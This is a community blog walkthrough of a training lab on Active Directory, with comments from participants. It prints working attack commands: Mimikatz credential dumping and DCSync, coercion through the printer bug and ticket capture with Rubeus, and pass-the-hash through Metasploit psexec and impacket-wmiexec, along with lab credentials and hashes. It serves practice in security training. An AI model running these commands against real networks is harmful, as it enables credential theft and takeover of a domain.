Blog Post

Community Blog
4 MIN READ

Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)

StefanApostol's avatar
StefanApostol
Icon for Immerser rankImmerser
24 days ago

Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1.

In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target.

Let's get started!

Task 1

What is the WS01 token in C:\Users\Administrator\Desktop\token.txt?

The credentials panel gives you the following username and password combination for host WS01.

offensive\jack.s:!nitialPass33.

Use the following command to log in to WS01:

xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution

The task asks you for the token in C:\users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-level user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools. Run all privilege escalation checks with the following command:

SharpUp audit

This gives you the credentials OffensiveAdmin:It’sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin:

xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution

With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt.

Task 2

What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt?

It’s clear from the task that we must get access to user tina.m who can connect to SRV01. With your new administrator privileges on WS01, open a task manager to check for possible user sessions.

You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz.

mimikatz.exe 
privilege::debug 
sekurlsa::logonpasswords

Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token.

Task 3

What is the DC token in C:\Users\Administrator\Desktop\token.txt?

The last task asks you to connect to the DC, which means you need to become a domain administrator.

Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them would be unconstrained delegation.

. .\PowerView-Dev.ps1 
Get-DomainComputer -Unconstrained -Properties dnshostname

It seems like SRV01 is trusted for unconstrained delegation. Since you have administrator privileges, you can obtain DC01’s ticket-granting ticket (TGT).

First, transfer Rubeus.exe, and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets.

Rubeus.exe monitor /interval:1

Then, force DC01 to make an SMB connection to SRV01 to grab the ticket.

.\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local
sed -i "s/ //g" ticket.txt 
tr -d "\n" < ticket.txt

Then, on SRV01, run the following command to pass it.

Rubeus.exe ptt /ticket:<formatted base64 encoded ticket>

If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$.

Now, transfer mimikatz.exe and run the following command:

mimikatz.exe 
lsadump::dcsync /user:administrator

This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows:

sudo msfconsole 
use exploit/windows/smb/psexec 
set smbuser administrator 
set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334 
set rhosts <DC IP> 
exploit

Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt.

Tools

For this challenge, you’ll use a range of tools including:

  • SharpUp
  • PowerView
  • Rubeus
  • MS-RPRN
  • Metasploit

Tips

When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application.

To learn more about some of the tools used in this lab, take a look at the following collections:

  • Windows Basics
  • Privilege Escalation: Windows
  • Introduction to Metasploit
  • Introduction to Active Directory Attacks
  • Kerberos

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done!

If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge!

Updated 24 days ago
Version 2.0
community challenge
StefanApostol's avatar
Icon for Immerser rankImmerser
Joined February 18, 2025
View Profile
Community Blog
Here you can read the Community Guidelines, Best Practice Guide and all the latest announcements from the Community Team.

9 Comments

  • steven's avatar
    steven
    Icon for Silver II rankSilver II
    24 days ago

    Was a nice lab. I struggled quite because I got a golden ticket (pass-the-hash) but wasn't able to access \\DC\c$

    But then, I've changed to another strategy and instead of psexec I used:

    impacket-wmiexec -dc-ip <DC ip> -target-ip <DC ip> administrator@<DC ip> -hashes aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334

    maybe to explain, why the hash has added an 'aad3b435b51404eeaad3b435b51404ee':
    Most newer Windows versions do not store passwords in LM format by default, and the string aad3b435b51404eeaad3b435b51404ee, called the Null LM hash, signifies that it is empty. So we need to add it. 

    • StefanApostol's avatar
      StefanApostol
      Icon for Immerser rankImmerser
      24 days ago

      hi! glad you liked it. also for impacket tools, you don't need to add the empty LM hash, you can simply use :2c9299e44ee3abcf5c6f9e7938123334 (notice the ":" is still there)

  • Xat's avatar
    Xat
    Icon for Bronze III rankBronze III
    23 days ago

    Wait a minute! I just had to retry the lab again to make sure I wasn't going crazy. On step 1 my 'OffensiveAdmin' password was expired:

    $ xfreerdp /v:10.102.57.161 /u:OffensiveAdmin /p:"It'sBlankAnyway" /cert-ignore +clipboard

    [19:30:32:656] [56154:56155] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_EXPIRED [0x0002000E]

    I had to find another "hack" to bypass and login to RDP with expired password.

    Did I break something? Or did StefanApostol​  give me a personal extra challenge?

    • steven's avatar
      steven
      Icon for Silver II rankSilver II
      23 days ago

      https://arstechnica.com/security/2025/04/windows-rdp-lets-you-log-in-using-revoked-passwords-microsoft-is-ok-with-that/

      I was able to just RDP into it:

      xfreerdp /v:10.102.191.140 /u:'OffensiveAdmin'  /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali

      (and then filling in the pwd)

      • Xat's avatar
        Xat
        Icon for Bronze III rankBronze III
        23 days ago

        It works for me now too (should have been more clear). I had to get the above error from my logs. No idea what I did wrong back then (was a fun extra challenge).